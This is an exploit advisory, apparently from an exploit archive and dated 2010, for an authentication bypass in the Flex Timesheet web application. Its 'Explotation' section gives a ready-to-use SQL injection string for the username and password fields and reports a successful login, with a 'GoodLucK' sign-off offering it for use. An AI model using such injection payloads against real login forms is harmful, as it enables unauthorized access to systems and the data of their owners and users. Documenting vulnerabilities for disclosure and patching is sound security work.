Flex Timesheet suffers from a remote SQL injection vulnerability that allows for authentication bypass.
10644486942f6e92c8481f43aaf25d6c08f87415e83df623643949c57221c2a0
===================================================
Flex Timesheet - Authentication Bypass() Vulnerability
===================================================
~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
{ H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Flex Timesheet
~Software: http://truworthit.com/ - Price:200$
~Vulnerability Style : Authentication Bypass()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
bypass foR Sql-i Code()
================================
Username : 'or'h4x0reSEC
Password : 'or'h4x0reSEC
================================
[+] Logged on.
GoodLucK ;)
# Inj3ct0r.com [2010-09-28]